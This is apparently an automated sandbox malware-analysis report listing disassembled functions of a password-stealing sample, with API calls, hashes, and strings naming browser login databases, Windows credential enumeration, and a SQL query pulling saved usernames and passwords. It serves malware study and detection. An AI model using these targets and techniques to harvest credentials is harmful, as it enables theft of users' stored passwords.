                                                                                                                                                                        • API ID: Handle$CloseProcessProcess32freememset$AddressCreateFirstFullImageModuleNameNextOpenProcQuerySnapshotToolhelp32
                                                                                                                                                                        • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                                                                                                        • API String ID: 3536422406-1740548384
                                                                                                                                                                        • Opcode ID: ed6fa7fbe2363a651f29f393370116b4659e51fbe7daf5e0a77eaee9eb31a363
                                                                                                                                                                        • Instruction ID: 336025cd3e57628a03d53de68a5eb917573850932ab3a304507e713d781e6372
                                                                                                                                                                        • Opcode Fuzzy Hash: ed6fa7fbe2363a651f29f393370116b4659e51fbe7daf5e0a77eaee9eb31a363
                                                                                                                                                                        • Instruction Fuzzy Hash: 3E518CB2C00118ABDB10DFA5DC84ADEF7B9AF95301F1040ABE508A3251DB799B84CF99
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040938F Relevance: 6.1, APIs: 4, Instructions: 58fileCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • FindFirstFileW.KERNELBASE(00000103,0000038B,00000000,?,00412880,*.*,?), ref: 004093A5
                                                                                                                                                                        • FindNextFileW.KERNELBASE(000000FF,0000038B,00000000,?,00412880,*.*,?), ref: 004093C3
                                                                                                                                                                        • wcslen.MSVCRT ref: 004093F3
                                                                                                                                                                        • wcslen.MSVCRT ref: 004093FB
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileFindwcslen$FirstNext
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2163959949-0
                                                                                                                                                                        • Opcode ID: bbfa88675e90f7cab1951949309c9f409910220031eaa870910243319b313dcd
                                                                                                                                                                        • Instruction ID: fe44496fd245f22b3294f1be8fcbf5b62ffed3b59158e7af3f9261faba672c79
                                                                                                                                                                        • Opcode Fuzzy Hash: bbfa88675e90f7cab1951949309c9f409910220031eaa870910243319b313dcd
                                                                                                                                                                        • Instruction Fuzzy Hash: CA11E97240A7019FD7149B64E884A9B73DCEF45324F204A3FF459E31C1EB78AC008718
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 004141E0 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • FindResourceW.KERNELBASE(?,?,?), ref: 004141ED
                                                                                                                                                                        • SizeofResource.KERNEL32(?,00000000), ref: 004141FE
                                                                                                                                                                        • LoadResource.KERNEL32(?,00000000), ref: 0041420E
                                                                                                                                                                        • LockResource.KERNEL32(00000000), ref: 00414219
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3473537107-0
                                                                                                                                                                        • Opcode ID: ec51cf45041cf25647cccbc885ed45c86f25aef72003178a0d679bc8b0aad2a7
                                                                                                                                                                        • Instruction ID: 4db2b1a63d72691fd362fce079069d1f86e41d88e51d490a39d61a138898f27d
                                                                                                                                                                        • Opcode Fuzzy Hash: ec51cf45041cf25647cccbc885ed45c86f25aef72003178a0d679bc8b0aad2a7
                                                                                                                                                                        • Instruction Fuzzy Hash: A8019636A002156B8F155FA5DD4999F7FAAFFC67D0708803AF915CA221DB70C882C688
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00418073 Relevance: 4.6, APIs: 3, Instructions: 79COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00417F9B: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 00417FC7
                                                                                                                                                                          • Part of subcall function 00417F9B: malloc.MSVCRT ref: 00417FD2
                                                                                                                                                                          • Part of subcall function 00417F9B: free.MSVCRT(?), ref: 00417FE2
                                                                                                                                                                          • Part of subcall function 00416CB6: GetVersionExW.KERNEL32(?), ref: 00416CD9
                                                                                                                                                                        • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004180ED
                                                                                                                                                                        • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 00418115
                                                                                                                                                                        • free.MSVCRT(00000000,?,00000000,?,00000000), ref: 0041811E
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1355100292-0
                                                                                                                                                                        • Opcode ID: 8e76693c67f0b4aa2a9f0ce93b5e4d32a4f514a6f71b86ff027121c958f9ef7a
                                                                                                                                                                        • Instruction ID: 44f72dfadcd4ed0e6b0cb1466d7c09a20078aec04da8d2fdb22fffa922359726
                                                                                                                                                                        • Opcode Fuzzy Hash: 8e76693c67f0b4aa2a9f0ce93b5e4d32a4f514a6f71b86ff027121c958f9ef7a
                                                                                                                                                                        • Instruction Fuzzy Hash: 8A215076800118BEEB21ABA4CC449EF7BBCAF09344F1540ABE641D7211EB784EC587A9
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0041829C Relevance: 3.0, APIs: 2, Instructions: 28COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • memset.MSVCRT ref: 004182A7
                                                                                                                                                                        • GetSystemInfo.KERNELBASE(00453D60,?,00000000,00442D20,?,?,?), ref: 004182B0
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: InfoSystemmemset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3558857096-0
                                                                                                                                                                        • Opcode ID: e09057acdafeef912d39132da5cb39305370b204b8372ac2ca77995ca7410ec3
                                                                                                                                                                        • Instruction ID: 3c0be6fe3b5a6ffc89f5b68e380a6edd79d3b36df5ca7f17532ee32b6b8f0e73
                                                                                                                                                                        • Opcode Fuzzy Hash: e09057acdafeef912d39132da5cb39305370b204b8372ac2ca77995ca7410ec3
                                                                                                                                                                        • Instruction Fuzzy Hash: 86E09235E01A242BE7117F767C07BDB26948F8A38AF04407BF904DA253EA6CCD414ADE
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00411E4C Relevance: 104.0, APIs: 43, Strings: 16, Instructions: 752COMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 0 411e4c-411e6c call 444b90 3 411e97-411ea0 0->3 4 411e6e-411e92 call 40a94c call 40956d call 40add0 call 4444b7 0->4 5 412146-41214f 3->5 6 411ea6-411ee4 memset call 4109c4 wcsrchr 3->6 4->3 9 412221-41222a 5->9 10 412155-4121a7 call 408d7d call 410d36 memset call 413ea4 5->10 19 411ee6 6->19 20 411ee9-411eff 6->20 12 412230-412292 memset * 2 call 414558 wcslen * 2 9->12 13 4122dd-4122e6 9->13 82 4121b6-4121d2 ExpandEnvironmentStringsW call 406a86 10->82 83 4121a9-4121b4 call 408250 10->83 34 412294-4122ac call 4083d6 12->34 35 4122ae 12->35 22 412399-4123a2 13->22 23 4122ec-41234e memset * 2 call 414558 wcslen * 2 13->23 19->20 26 411f01-411f07 20->26 27 411f0b-411f0e 20->27 29 412552-41255b 22->29 30 4123a8-41240c memset * 3 22->30 46 412350-412368 call 4083d6 23->46 47 41236a 23->47 26->27 36 411f09 26->36 42 411f10-411f19 27->42 43 411f1f-411f21 27->43 38 4125a8-4125b1 29->38 39 41255d-412582 memset call 401c43 29->39 40 41244c-412478 call 414558 wcslen * 2 30->40 41 41240e-412417 30->41 53 4122b3-4122c0 call 408250 34->53 35->53 36->27 49 412902-412908 38->49 50 4125b7-4125c7 38->50 61 412587-412590 39->61 75 412494 40->75 76 41247a-412492 call 4083d6 40->76 41->40 56 412419-412447 call 40807e call 411cdb call 411c61 41->56 42->43 57 411f1b 42->57 44 411f23-411f27 43->44 45 411f92-411f9c call 408d7d call 410f47 43->45 44->45 58 411f29-411f62 call 407991 call 408d7d call 411dd0 44->58 97 411fa1-411faa 45->97 60 41236f-41237c call 408250 46->60 47->60 64 4125c9-4125e9 call 40830a _wcsicmp 50->64 65 41260c-412685 memset * 3 call 414558 wcslen * 2 50->65 53->13 93 4122c2-4122d8 call 40299e 53->93 56->29 57->43 114 411fd8-411feb call 408d9f 58->114 145 411f64-411f8e call 408ecf call 407991 58->145 60->22 102 41237e-412394 call 40299e 60->102 79 4125a3-4125a6 61->79 80 412592-41259f 61->80 100 4125f5-412607 call 4442f9 64->100 101 4125eb-4125f0 64->101 106 4126a1 65->106 107 412687-41269f call 4083d6 65->107 92 41249c-4124cc call 411c61 wcslen * 2 75->92 76->92 79->38 80->79 99 4121d7-4121dc 82->99 83->82 108 4121e5-4121eb 83->108 130 4124e8 92->130 131 4124ce-4124e6 call 4083d6 92->131 93->13 97->114 115 411fac-411fd6 call 408ecf call 407991 97->115 99->108 111 4121de-4121e3 99->111 100->49 116 4128f5-4128fd call 40299e 101->116 102->22 109 4126a9-4126b9 call 408250 106->109 107->109 125 412216-41221f call 408d9f 108->125 126 4121ed 108->126 142 4126c3-4126cb 109->142 143 4126bb 109->143 111->125 147 411ff1-411ffb call 4133d2 call 413424 114->147 148 412144 114->148 115->114 116->49 125->9 135 4121f3-412214 call 408ecf call 407991 126->135 132 4124f0-412520 call 411c61 wcslen * 2 130->132 131->132 158 412522-41253a call 4083d6 132->158 159 41253c 132->159 135->125 151 412737-41274b call 4442f9 142->151 152 4126cd-4126ef wcslen * 2 142->152 143->142 181 411f90 145->181 179 412000-412010 call 41367d 147->179 148->5 173 412896-4128b8 wcslen * 2 151->173 160 4126f1-412709 call 4083d6 152->160 161 41270b 152->161 166 412544-41254d call 411c61 158->166 159->166 169 412713-412723 call 408250 160->169 161->169 166->29 188 412725 169->188 189 41272d-412735 169->189 183 4128d4 173->183 184 4128ba-4128d2 call 4083d6 173->184 190 412016-4120bd memset * 4 call 408328 * 3 179->190 191 412138-412141 call 413401 179->191 181->114 187 4128dc-4128ec call 408250 183->187 184->187 187->49 203 4128ee 187->203 188->189 189->151 192 412750-412790 memset wcslen * 2 189->192 190->191 214 4120bf-4120e0 wcslen * 2 190->214 191->148 197 412792-4127aa call 4083d6 192->197 198 4127ac 192->198 204 4127b4-4127ed call 409332 197->204 198->204 203->116 211 412874-412882 call 40938f 204->211 218 4127f2-412800 call 4092ee 211->218 219 412888-412894 call 409428 211->219 216 4120e2-4120fa call 4083d6 214->216 217 4120fc 214->217 223 412105-412115 call 408250 216->223 217->223 218->211 229 412802-412827 wcslen * 2 218->229 219->173 223->191 232 412117-412133 call 407991 223->232 230 412846 229->230 231 412829-412844 call 4083d6 229->231 235 41284e-41285e call 408250 230->235 231->235 232->191 235->211 239 412860-41286f call 4442f9 235->239 239->211
                                                                                                                                                                        APIs
                                                                                                                                                                        • memset.MSVCRT ref: 00411EC2
                                                                                                                                                                        • wcsrchr.MSVCRT ref: 00411EDB
                                                                                                                                                                        • memset.MSVCRT ref: 0041202F
                                                                                                                                                                          • Part of subcall function 0040A94C: _wcslwr.MSVCRT ref: 0040AA14
                                                                                                                                                                          • Part of subcall function 0040A94C: wcslen.MSVCRT ref: 0040AA29
                                                                                                                                                                          • Part of subcall function 0040956D: CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 004095A6
                                                                                                                                                                          • Part of subcall function 0040956D: wcslen.MSVCRT ref: 004095CC
                                                                                                                                                                          • Part of subcall function 0040956D: wcsncmp.MSVCRT(?,?,00000020,?,00000000,?), ref: 00409602
                                                                                                                                                                          • Part of subcall function 0040956D: memset.MSVCRT ref: 00409679
                                                                                                                                                                          • Part of subcall function 0040956D: memcpy.MSVCRT ref: 0040969A
                                                                                                                                                                          • Part of subcall function 0040ADD0: LoadLibraryW.KERNELBASE(pstorec.dll), ref: 0040ADE1
                                                                                                                                                                          • Part of subcall function 0040ADD0: GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 0040ADF4
                                                                                                                                                                          • Part of subcall function 004444B7: memcmp.MSVCRT ref: 0044455D
                                                                                                                                                                          • Part of subcall function 00410F47: memset.MSVCRT ref: 00410F6A
                                                                                                                                                                          • Part of subcall function 00410F47: memset.MSVCRT ref: 00410F7F
                                                                                                                                                                          • Part of subcall function 00410F47: memset.MSVCRT ref: 00410F94
                                                                                                                                                                          • Part of subcall function 00410F47: memset.MSVCRT ref: 00410FA9
                                                                                                                                                                          • Part of subcall function 00410F47: memset.MSVCRT ref: 00410FBE
                                                                                                                                                                          • Part of subcall function 00410F47: wcslen.MSVCRT ref: 00410FE4
                                                                                                                                                                          • Part of subcall function 00410F47: wcslen.MSVCRT ref: 00410FF5
                                                                                                                                                                          • Part of subcall function 00410F47: wcslen.MSVCRT ref: 0041102D
                                                                                                                                                                          • Part of subcall function 00410F47: wcslen.MSVCRT ref: 0041103B
                                                                                                                                                                          • Part of subcall function 00410F47: wcslen.MSVCRT ref: 00411074
                                                                                                                                                                          • Part of subcall function 00410F47: wcslen.MSVCRT ref: 00411082
                                                                                                                                                                        • memset.MSVCRT ref: 0041204B
                                                                                                                                                                        • memset.MSVCRT ref: 00412061
                                                                                                                                                                        • memset.MSVCRT ref: 0041207D
                                                                                                                                                                        • wcslen.MSVCRT ref: 004120C4
                                                                                                                                                                        • wcslen.MSVCRT ref: 004120D1
                                                                                                                                                                        • ExpandEnvironmentStringsW.KERNEL32(%programfiles%\Sea Monkey,?,00000104), ref: 004121C5
                                                                                                                                                                        • memset.MSVCRT ref: 0041217E
                                                                                                                                                                          • Part of subcall function 00407991: memset.MSVCRT ref: 004079D1
                                                                                                                                                                          • Part of subcall function 00407991: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000104,00000000,00000000,?,00000000,?), ref: 004079EA
                                                                                                                                                                          • Part of subcall function 00407991: memset.MSVCRT ref: 00407A23
                                                                                                                                                                          • Part of subcall function 00407991: memset.MSVCRT ref: 00407A3B
                                                                                                                                                                          • Part of subcall function 00407991: memset.MSVCRT ref: 00407A53
                                                                                                                                                                          • Part of subcall function 00407991: memset.MSVCRT ref: 00407A6B
                                                                                                                                                                          • Part of subcall function 00407991: memset.MSVCRT ref: 00407A83
                                                                                                                                                                          • Part of subcall function 00407991: wcslen.MSVCRT ref: 00407A8E
                                                                                                                                                                          • Part of subcall function 00407991: wcslen.MSVCRT ref: 00407A9C
                                                                                                                                                                          • Part of subcall function 00407991: wcslen.MSVCRT ref: 00407ACB
                                                                                                                                                                        • memset.MSVCRT ref: 00412241
                                                                                                                                                                        • memset.MSVCRT ref: 0041225B
                                                                                                                                                                        • wcslen.MSVCRT ref: 00412275
                                                                                                                                                                        • wcslen.MSVCRT ref: 00412283
                                                                                                                                                                        • memset.MSVCRT ref: 004122FD
                                                                                                                                                                        • memset.MSVCRT ref: 00412317
                                                                                                                                                                        • wcslen.MSVCRT ref: 00412331
                                                                                                                                                                        • wcslen.MSVCRT ref: 0041233F
                                                                                                                                                                        • memset.MSVCRT ref: 004123C2
                                                                                                                                                                        • memset.MSVCRT ref: 004123E0
                                                                                                                                                                        • memset.MSVCRT ref: 004123FE
                                                                                                                                                                        • memset.MSVCRT ref: 00412573
                                                                                                                                                                          • Part of subcall function 00407991: wcslen.MSVCRT ref: 00407AD9
                                                                                                                                                                          • Part of subcall function 00407991: wcslen.MSVCRT ref: 00407B08
                                                                                                                                                                          • Part of subcall function 00407991: wcslen.MSVCRT ref: 00407B16
                                                                                                                                                                          • Part of subcall function 00407991: wcslen.MSVCRT ref: 00407B45
                                                                                                                                                                          • Part of subcall function 00407991: wcslen.MSVCRT ref: 00407B53
                                                                                                                                                                          • Part of subcall function 00407991: wcslen.MSVCRT ref: 00407B82
                                                                                                                                                                          • Part of subcall function 00407991: wcslen.MSVCRT ref: 00407B90
                                                                                                                                                                          • Part of subcall function 00407991: SetCurrentDirectoryW.KERNEL32(?), ref: 00407CAB
                                                                                                                                                                        • wcslen.MSVCRT ref: 0041245B
                                                                                                                                                                        • wcslen.MSVCRT ref: 00412469
                                                                                                                                                                        • wcslen.MSVCRT ref: 004124AF
                                                                                                                                                                        • wcslen.MSVCRT ref: 004124BD
                                                                                                                                                                        • wcslen.MSVCRT ref: 00412503
                                                                                                                                                                        • wcslen.MSVCRT ref: 00412511
                                                                                                                                                                        • _wcsicmp.MSVCRT ref: 004125DA
                                                                                                                                                                          • Part of subcall function 004442F9: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000000,0041274B,?,?), ref: 00444310
                                                                                                                                                                          • Part of subcall function 004442F9: ??2@YAPAXI@Z.MSVCRT ref: 00444324
                                                                                                                                                                          • Part of subcall function 004442F9: memset.MSVCRT ref: 00444333
                                                                                                                                                                          • Part of subcall function 004442F9: ??3@YAXPAX@Z.MSVCRT ref: 00444356
                                                                                                                                                                          • Part of subcall function 004442F9: CloseHandle.KERNEL32(00000000), ref: 0044435D
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: wcslen$memset$??2@??3@AddressByteCharCloseCredCurrentDirectoryEnumerateEnvironmentExpandFileHandleLibraryLoadMultiProcSizeStringsWide_wcsicmp_wcslwrmemcmpmemcpywcsncmpwcsrchr
                                                                                                                                                                        • String ID: %programfiles%\Sea Monkey$*.*$Chromium\User Data$Data\Profile$Google\Chrome SxS\User Data$Google\Chrome\User Data$Login Data$Opera$Opera Software\Opera Stable\Login Data$Opera\Opera7\profile\wand.dat$Opera\Opera\wand.dat$Path$SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe$Vivaldi\User Data\Default\Login Data$Yandex\YandexBrowser\User Data\Default\Login Data$wand.dat
                                                                                                                                                                        • API String ID: 2195781745-1743926287
                                                                                                                                                                        • Opcode ID: 0dfe16fee904680cb0bfa71703a20f26bea0553467f296cf69df4e43642452a8
                                                                                                                                                                        • Instruction ID: 7a0d4c8da9719b4bd57d9e34dd235b5097b77d6fd782259e08ea59ad0a0aa82b
                                                                                                                                                                        • Opcode Fuzzy Hash: 0dfe16fee904680cb0bfa71703a20f26bea0553467f296cf69df4e43642452a8
                                                                                                                                                                        • Instruction Fuzzy Hash: 774293B2509344ABD720EBA5D985BDBB3ECBF84304F01092FF588D3191EBB8D545879A
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040FF55 Relevance: 35.1, APIs: 17, Strings: 3, Instructions: 149COMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00403C8C: LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,0040FF6D,00000000,?,00000002,?,004448C6,00000000,?,0000000A), ref: 00403CAB
                                                                                                                                                                          • Part of subcall function 00403C8C: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00403CBD
                                                                                                                                                                          • Part of subcall function 00403C8C: FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,0040FF6D,00000000,?,00000002,?,004448C6,00000000,?,0000000A), ref: 00403CD1
                                                                                                                                                                          • Part of subcall function 00403C8C: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00403CFC
                                                                                                                                                                        • SetErrorMode.KERNELBASE(00008001,00000000,?,00000002,?,004448C6,00000000,?,0000000A), ref: 0040FF81
                                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,00414266,00000000,?,00000002,?,004448C6,00000000,?,0000000A), ref: 0040FF9A
                                                                                                                                                                        • EnumResourceTypesW.KERNEL32(00000000,?,00000002), ref: 0040FFA1
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                                                                                                                                        • String ID: $/deleteregkey$/savelangfile
                                                                                                                                                                        • API String ID: 2744995895-28296030
                                                                                                                                                                        • Opcode ID: f4a827cf65cbb4cb0b27562536f3745cfcd0fc63cfd5dde0fe9220dbb6d92dd4
                                                                                                                                                                        • Instruction ID: 58268879d1a8d32d9d01966b45afca8998e7ac275f8ef3c48d75c103cdcc3135
                                                                                                                                                                        • Opcode Fuzzy Hash: f4a827cf65cbb4cb0b27562536f3745cfcd0fc63cfd5dde0fe9220dbb6d92dd4
                                                                                                                                                                        • Instruction Fuzzy Hash: A8518F71508745AFDB20AFA2DC49A9FB7A8FF45344F40083EF684E2152DB79D8848B5A
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00409CB0 Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 165COMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 351 409cb0-409cda call 405e89 call 4060bc 356 409ce0-409d05 351->356 357 409ea5-409eb4 call 405ecf 351->357 358 409d09-409d1b call 4063bb 356->358 363 409d21-409da0 call 409755 * 7 memset call 408f43 358->363 364 409e7b-409e88 call 40607f 358->364 388 409da2-409db3 call 40695a 363->388 389 409dce-409dd3 363->389 370 409d07 364->370 371 409e8e-409e9a call 408f1e 364->371 370->358 371->357 377 409e9c-409ea4 free 371->377 377->357 396 409db5 388->396 397 409db8-409dc6 wcschr 388->397 391 409dd5-409ddb 389->391 392 409dde-409de3 389->392 391->392 394 409de5-409df6 memcpy 392->394 395 409df9-409dfe 392->395 394->395 398 409e00-409e11 memcpy 395->398 399 409e14-409e19 395->399 396->397 397->389 400 409dc8-409dcb 397->400 398->399 401 409e1b-409e2c memcpy 399->401 402 409e2f-409e34 399->402 400->389 401->402 403 409e36-409e47 memcpy 402->403 404 409e4a-409e4f 402->404 403->404 405 409e51-409e60 404->405 406 409e63-409e68 404->406 405->406 406->364 407 409e6a-409e6e 406->407 407->364 408 409e70-409e78 407->408 408->364
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 004060BC: _wcsicmp.MSVCRT ref: 004060ED
                                                                                                                                                                          • Part of subcall function 004063BB: memset.MSVCRT ref: 004064B7
                                                                                                                                                                        • free.MSVCRT(00000000), ref: 00409E9F
                                                                                                                                                                          • Part of subcall function 00409755: _wcsicmp.MSVCRT ref: 0040976E
                                                                                                                                                                        • memset.MSVCRT ref: 00409D85
                                                                                                                                                                          • Part of subcall function 00408F43: wcslen.MSVCRT ref: 00408F56
                                                                                                                                                                          • Part of subcall function 00408F43: memcpy.MSVCRT ref: 00408F75
                                                                                                                                                                        • wcschr.MSVCRT ref: 00409DBD
                                                                                                                                                                        • memcpy.MSVCRT ref: 00409DF1
                                                                                                                                                                        • memcpy.MSVCRT ref: 00409E0C
                                                                                                                                                                        • memcpy.MSVCRT ref: 00409E27
                                                                                                                                                                        • memcpy.MSVCRT ref: 00409E42
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                                                                                                                                                        • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                                                                                                                        • API String ID: 3849927982-2252543386
                                                                                                                                                                        • Opcode ID: 25591710af33cd07455ce6db1f3b2dc3e075db32bc947d0e32b1a7c168253070
                                                                                                                                                                        • Instruction ID: 4efc6fce7ce7295637414d4ef923d95a635c1e3a2e0485d2030de31f1e6ccd1f
                                                                                                                                                                        • Opcode Fuzzy Hash: 25591710af33cd07455ce6db1f3b2dc3e075db32bc947d0e32b1a7c168253070
                                                                                                                                                                        • Instruction Fuzzy Hash: 4051FE71D40209ABEB50EFA5DC45B9EB7B8AF54304F15403BB504B72D2EB78AD048B98
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040299E Relevance: 24.8, APIs: 12, Strings: 2, Instructions: 250fileCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        APIs
                                                                                                                                                                        • memset.MSVCRT ref: 004029C4
                                                                                                                                                                        • CreateFileW.KERNELBASE(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004029DB
                                                                                                                                                                        • CopyFileW.KERNEL32(?,?,00000000), ref: 004029FC
                                                                                                                                                                        • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00402A07
                                                                                                                                                                        • memset.MSVCRT ref: 00402A20
                                                                                                                                                                        • DeleteFileW.KERNEL32(?), ref: 00402C96
                                                                                                                                                                          • Part of subcall function 004080FD: GetTempPathW.KERNEL32(00000104,?,?), ref: 00408114
                                                                                                                                                                          • Part of subcall function 004080FD: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00408126
                                                                                                                                                                          • Part of subcall function 004080FD: GetTempFileNameW.KERNELBASE(?,004029F6,00000000,?), ref: 0040813D
                                                                                                                                                                        • memset.MSVCRT ref: 00402A95
                                                                                                                                                                          • Part of subcall function 00408C93: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,000003FF,000003FF,00402B19,?,?,000003FF,00000000), ref: 00408CA5
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000000FF), ref: 00402B6E
                                                                                                                                                                          • Part of subcall function 00403BB9: LoadLibraryW.KERNEL32(crypt32.dll,?,00000000,004027E9,?,00000090,00000000,?), ref: 00403BC8
                                                                                                                                                                          • Part of subcall function 00403BB9: GetProcAddress.KERNEL32(00000000,CryptUnprotectData), ref: 00403BDA
                                                                                                                                                                          • Part of subcall function 00403BB9: FreeLibrary.KERNEL32(00000000), ref: 00403BFD
                                                                                                                                                                        • memset.MSVCRT ref: 00402BF7
                                                                                                                                                                        • memcpy.MSVCRT ref: 00402C0A
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32 ref: 00402C31
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 00402C3A
                                                                                                                                                                        Strings
                                                                                                                                                                        • chp, xrefs: 004029E6
                                                                                                                                                                        • SELECT origin_url, action_url, username_element, username_value, password_element, password_value, signon_realm, date_created from logins , xrefs: 00402A61
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Filememset$ByteCharMultiWide$FreeLibraryTemp$AddressChangeCloseCopyCreateDeleteDirectoryFindLoadLocalNameNotificationPathProcWindowsmemcpy
                                                                                                                                                                        • String ID: SELECT origin_url, action_url, username_element, username_value, password_element, password_value, signon_realm, date_created from logins $chp
                                                                                                                                                                        • API String ID: 1340729801-1844170479
                                                                                                                                                                        • Opcode ID: 81020742f08cd979592eeacad5d893b131c1d3e65ead4c73e8d07300279ec837
